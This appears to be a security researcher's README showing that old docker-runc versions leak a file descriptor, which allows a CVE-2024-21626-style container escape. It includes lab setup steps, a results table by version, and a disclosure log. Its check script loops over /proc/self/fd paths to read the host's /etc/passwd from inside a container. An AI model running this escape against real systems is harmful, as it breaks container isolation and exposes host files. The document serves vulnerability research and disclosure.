## https://sploitus.com/exploit?id=BC9FEEE6-2FB9-5AB9-AE66-FA9A45EC059B
# Container escape vulnerability in old runc components (CVE-2024-21626)
During my analysis about [CVE-2024-21626](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/) I found that other older docker components are vulnerable about *fd leakage* (that is not mentioned in the [security advisory GHSA-xr7r-f8xq-vfvv](https://github.com/advisories/GHSA-xr7r-f8xq-vfvv)). Read my full article for detailed explanation [here](https://sk3pper.github.io/posts/cve-2024-21626/exploring-hidden-vulnerabilities-in-legacy-docker-versions/).
## 1. Setup environment π¨
#### A. Download and install [Ubuntu 18.04.6 LTS (Bionic Beaver)](https://releases.ubuntu.com/18.04/) version
During the installation do not check the box to download update system.
#### B. Install the vulnerable docker version and related components
- Go to https://download.docker.com/linux/static/stable/x86_64/ and download the old version ***docker-X.Y.Z-ce.tgz*** to test
- Extract it, copy the content to `/usr/bin` path and run Docker daemon.
```shell
cd Downloads/
tar xzvf <docker-X.Y.Z-ce.tgz>
sudo cp docker/* /usr/bin/
sudo dockerd &
```
#### C. Check the installed versions
```shell
sudo docker version
containerd --version
uname -r
```
In old versions we have `docker-runc` instead of `runc`. Hence check it:
```shell
ls -la /usr/bin | grep docker
-rwxr-xr-x 1 root root 14128576 mar 19 10:54 docker
-rwxr-xr-x 1 root root 8932648 mar 19 10:54 docker-containerd
-rwxr-xr-x 1 root root 8381448 mar 19 10:54 docker-containerd-ctr
-rwxr-xr-x 1 root root 3047368 mar 19 10:54 docker-containerd-shim
-rwxr-xr-x 1 root root 39989264 mar 19 10:54 dockerd
-rwxr-xr-x 1 root root 772400 mar 19 10:54 docker-init
-rwxr-xr-x 1 root root 2534781 mar 19 10:54 docker-proxy
-rwxr-xr-x 1 root root 7092608 mar 19 10:54 docker-runc
ls -la /usr/bin| grep runc
-rwxr-xr-x 1 root root 10232 mar 18 2018 bdftruncate
-rwxr-xr-x 1 root root 7092608 mar 19 10:54 docker-runc
-rwxr-xr-x 1 root root 35000 gen 18 2018 runcon
-rwxr-xr-x 1 root root 39096 gen 18 2018 truncate
```
Check the version of **doker-runc/runc**
```shell
runc --version
docker-runc -v
```
## 2. Check if the target is vulnerable and find the right fd π§
Run `checkVulnerability.sh` and see if the file is printed in the the terminal
```shell
# checkVulnerability.sh
#! /bin/bash
for i in {4..20}; do
sudo docker run -it --rm -w /proc/self/fd/$i alpine:3.14.3 sh -c "tail /proc/self/cwd/../../../etc/passwd"
echo ""
done
```
```shell
# clone CVE-2024-21626-old-docker-versions repository
git clone git@github.com:Sk3pper/CVE-2024-21626-old-docker-versions.git
# run checkVulnerability.sh
chmod +x checkVulnerability.sh
./checkVulnerability.sh
```
For this example I used `docker-17.03.1-ce` version.
![check vulnerability & find fd](./images/check_target_vulnerability.png)
## 3. Try the exploit π«
For this example I used `docker-17.03.1-ce` version.
![exploit](./images/exploit.png)
## 4. Tests Results π§ͺ
Below are the results of my analysis, organized by Docker version and the associated runc version used.
### docker-runc
| Docker Version | docker-runc version | Leaked fd number |
| ------------- |:-------------:| :-------------: |
| docker-17.03.1-ce.tgz | 1.0.0-rc2 | /proc/self/fd/4 |
| docker-17.03.2-ce.tgz | 1.0.0-rc2 | /proc/self/fd/4 |
| docker-17.06.0-ce.tgz | 1.0.0-rc3 | /proc/self/fd/5 |
| docker-17.06.1-ce.tgz | 1.0.0-rc3 | /proc/self/fd/5 |
| docker-17.06.2-ce.tgz | 1.0.0-rc3 | /proc/self/fd/5 |
| docker-17.09.0-ce.tgz | 1.0.0-rc4+dev | /proc/self/fd/5 |
| docker-17.09.1-ce.tgz | 1.0.0-rc4+dev | /proc/self/fd/5 |
| docker-17.12.0-ce.tgz | 1.0.0-rc4+dev | β |
| docker-17.12.1-ce.tgz | 1.0.0-rc4+dev | β |
| docker-18.03.0-ce.tgz | | β |
| docker-18.06.3-ce.tgz | 1.0.0-rc5+dev | β |
### runc
| Docker Version | runc version | Leaked fd number |
| ------------- |:-------------:| :-------------: |
| docker-18.09.0.tgz | 1.0.0-rc5+dev | β |
Here is the screenshot showing the three different vulnerable versions.
1.0.0-rc2 | 1.0.0-rc3 | 1.0.0-rc4+dev
:-------------------------:|:-------------------------: |:-------------------------:
![1.0.0-rc2 ](./images/17.03.1-1.0.0-rc2-fd4.png) | ![1.0.0-rc3](./images/17.06.0-1.0.0-rc3-fd5.png) | ![1.0.0-rc4](./images/17.09.1-1.0.0-rc4-fd5.png)
As with [CVE-2024-21626](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/), the different types of attacks are still possible.
## 5. Conclusion & Takeaways π
This vulnerability is quite different from the [CVE-2024-21626](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/) because:
1. It can be triggered in **older Linux versions** that lack the `openat2` syscall.
2. The leaked file descriptor is located in the `/run/runc/<container>/` path, which contains the state for running containers, rather than the hostβs `/sys/fs/cgroup` directory.
What I discovered is that older versions are also vulnerable to the ***same attack technique***. Although the vulnerability itself differs, the result is the same: **gaining access to the host filesystem**. The key takeaway is to not rely solely on security advisories - test everything thoroughly. Fully understand the CVE, how it works, experiment with it in a safe environment, and explore edge cases.
## 6. Responsible disclosure πΊπ»
I tried to contact `security@docker.com`, `security@opencontainers.org`, and try to open a `CVE`. I received the following replies:
| Request | Reply |
| ------------- |:-------------|
| security@docker.com (19/03/24) |The versions you have listed are all EOL versions of software (~7 years old) and are no longer patched or maintained by Docker. If you have a concern about the versions or wording listed in the existing GHSA-xr7r-f8xq-vfvv advisory ("affected versions: >= 1.0.0-rc93, <= 1.1.11"), then the correct channel to report it should be to the OCI security mailbox: https://github.com/opencontainers/.github/blob/main/SECURITY.md Thank you for reaching out. Let us know if there is anything else we can do
| security@opencontainers.org (20/03/24) |no response
| CVE-MITRE (15/05/2024) |We normally do not assign CVE IDs to issues that exist only in release candidates. https://vulners.com/cve/CVE-2024-21626 had affected released versions of runc, such as release 1.1.11.|